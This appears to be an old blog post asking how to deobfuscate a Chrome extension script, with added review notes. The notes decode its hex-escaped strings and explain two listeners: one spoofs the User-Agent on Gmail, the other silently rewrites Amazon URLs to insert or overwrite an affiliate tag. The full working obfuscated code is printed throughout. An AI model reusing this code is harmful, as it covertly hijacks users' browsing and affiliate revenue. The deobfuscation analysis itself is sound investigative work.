Friday, 13 September 2013

How can I deobfuscate this javascript?

How can I deobfuscate this javascript?

I have the following code and I am trying to deobfuscate it to readable
javascript. I tried jsbeautifier but it doesn't work. I found a lot of
links to various deobfuscators, but either they don't work or they are
only for Linux. So how do I deobfuscate this code so it is readable
javascript?
// Analysis notes (added in review; the code below is unchanged).
//
// Two layers of obfuscation are used here: every string is written with \xNN
// hex escapes and kept in the lookup array _0xc819, and property names are
// then reached through bracket access on that array. A beautifier only
// repairs whitespace, so the strings still have to be decoded. \xNN escapes
// are ordinary string literals: evaluating the array literal alone (it
// contains no calls) yields the plain text. Do not run the whole script to
// decode it.
//
// _0xc819 decoded:
//   [0]  "requestHeaders"
//   [1]  "toLowerCase"
//   [2]  "name"
//   [3]  "user-agent"
//   [4]  "value"
//   [5]  "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
//   [6]  "forEach"
//   [7]  "http://mail.google.com/*"
//   [8]  "https://mail.google.com/*"
//   [9]  "main_frame"
//   [10] "sub_frame"
//   [11] "blocking"
//   [12] "addListener"
//   [13] "onBeforeSendHeaders"
//   [14] "webRequest"
//
// With the table substituted, the statement is a call to
// chrome.webRequest.onBeforeSendHeaders.addListener(callback, filter, extra):
//   - callback(_0xb56fx1): takes _0xb56fx1.requestHeaders, and for every
//     header whose lower-cased name equals "user-agent" overwrites its value
//     with entry [5]; it returns { requestHeaders: <the modified list> }.
//   - filter: urls = entries [7] and [8], types = "main_frame" and "sub_frame".
//   - extra:  ["blocking", "requestHeaders"], so the listener can rewrite
//     the headers before the request is sent.
// Net effect: requests for mail.google.com pages and frames go out with an
// Internet Explorer 8 User-Agent string instead of the browser's own.
// NOTE(review): why the author wants that is not visible in this code.
// NOTE(review): a blocking webRequest listener needs the webRequest and
// webRequestBlocking permissions plus host access in the extension manifest.
// The manifest is not shown here; check it to see the extension's full reach.
var
_0xc819=["\x72\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72\x73","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x6E\x61\x6D\x65","\x75\x73\x65\x72\x2D\x61\x67\x65\x6E\x74","\x76\x61\x6C\x75\x65","\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x38\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x30\x29","\x66\x6F\x72\x45\x61\x63\x68","\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x69\x6C\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F\x2A","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x6D\x61\x69\x6C\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F\x2A","\x6D\x61\x69\x6E\x5F\x66\x72\x61\x6D\x65","\x73\x75\x62\x5F\x66\x72\x61\x6D\x65","\x62\x6C\x6F\x63\x6B\x69\x6E\x67","\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6F\x6E\x42\x65\x66\x6F\x72\x65\x53\x65\x6E\x64\x48\x65\x61\x64\x65\x72\x73","\x77\x65\x62\x52\x65\x71\x75\x65\x73\x74"];chrome[_0xc819[14]][_0xc819[13]][_0xc819[12]](function
(_0xb56fx1){var
_0xb56fx2=_0xb56fx1[_0xc819[0]];_0xb56fx2[_0xc819[6]](function
(_0xb56fx3,_0xb56fx4){if(_0xb56fx3[_0xc819[2]][_0xc819[1]]()==_0xc819[3]){_0xb56fx3[_0xc819[4]]=_0xc819[5];}
;} );return {requestHeaders:_0xb56fx2};}
,{urls:[_0xc819[7],_0xc819[8]],types:[_0xc819[9],_0xc819[10]]},[_0xc819[11],_0xc819[0]]);
// Analysis notes (added in review; the code below is unchanged).
//
// This second listener is obfuscated only by hex-escaping its literals:
//   mt     = "produtid-20"
//   te     = "tag="
//   site   = "amazon.com"
//   "\x2F\x67\x70\x2F\x63\x61\x72\x74..." = "/gp/cart/view.html"
//   "\x2F\x64\x70\x2F"                    = "/dp/"
//   "\x2F\x67\x70\x2F"                    = "/gp/"
//   "\x2F\x72\x65\x67\x69\x73\x74\x72\x79\x2F" = "/registry/"
//   regExp = /([\&\?]?tag=)[^\&]+/gi
//   filter urls = "http://www.amazon.com/*" and "https://www.amazon.com/*"
//
// What it does: a blocking chrome.webRequest.onBeforeRequest listener on
// main_frame requests to www.amazon.com. It may return { redirectUrl } to
// send the navigation to a rewritten URL.
//   1. Returns without changes for the bare home page (http or https), for
//      any URL containing "/gp/cart/view.html", and for any URL that contains
//      none of "/dp/", "/gp/", "/registry/".
//   2. Collects existing tag=... parameters with regExp.
//      - Exactly one match: if the URL already contains mt, do nothing;
//        otherwise replace that tag's value with mt and redirect.
//      - More than one match: strip all of them and continue to step 3.
//   3. If the URL does not contain mt, insert "tag=" + mt after the first
//      "&", else after the first "?", else append "?tag=" + mt, and redirect.
// `if( c && c.length ) { }` and `var extra` have no effect (dead code).
//
// Net effect: matching navigations on www.amazon.com are redirected to the
// same URL carrying tag=produtid-20, overwriting any tag already present.
// NOTE(review): the "tag=" parameter and the "-20" suffix look like an Amazon
// affiliate tracking ID, which would make this affiliate-tag injection or
// hijacking. That reading is inferred from the value's shape and the code
// does not confirm it.
// For triage: "tag=produtid-20" appearing in Amazon URLs the user did not
// follow from a link is the visible indicator of this listener being active.
chrome.webRequest.onBeforeRequest.addListener( function(info) { var url =
info.url; var mt = "\x70\x72\x6F\x64\x75\x74\x69\x64\x2D\x32\x30"; var te
= '\x74\x61\x67\x3D'; var site =
"\x61\x6D\x61\x7A\x6F\x6E\x2E\x63\x6F\x6D"; if(url ==
'http://www.'+site+'/') { return; } if(url == 'https://www.'+site+'/') {
return; } if(
url.indexOf("\x2F\x67\x70\x2F\x63\x61\x72\x74\x2F\x76\x69\x65\x77\x2E\x68\x74\x6D\x6C")
> 0 ) { return; } if( ! ( url.indexOf("\x2F\x64\x70\x2F") > 0 ||
url.indexOf("\x2F\x67\x70\x2F") > 0 ||
url.indexOf("\x2F\x72\x65\x67\x69\x73\x74\x72\x79\x2F") > 0 ) ) { return;
} var regExp = /([\&\?]?\x74\x61\x67\x3D)[^\&]+/gi; var c =
url.match(regExp); if( c && c.length ) { } if( c && c.length == 1 ) { if(
url.indexOf(mt) >= 0 ) { return; } url = url.replace(regExp, '$1'+mt);
return {redirectUrl: url }; } else if( c && c.length > 1 ) { url =
url.replace(regExp, ''); } if( url.indexOf(mt) < 0 ) { var extra = ''; if(
url.indexOf('&') >= 0 ) { url = url.replace('&','&'+te+mt+'&'); } else if(
url.indexOf('?') >= 0 ) { url = url.replace('?','?'+te+mt+'&'); } else {
url += '?'+te+mt; } return {redirectUrl: url }; } return; }, { urls: [
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x6D\x61\x7A\x6F\x6E\x2E\x63\x6F\x6D\x2F\x2A",
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x6D\x61\x7A\x6F\x6E\x2E\x63\x6F\x6D\x2F\x2A",
], types: ["main_frame"] }, ["blocking"]);
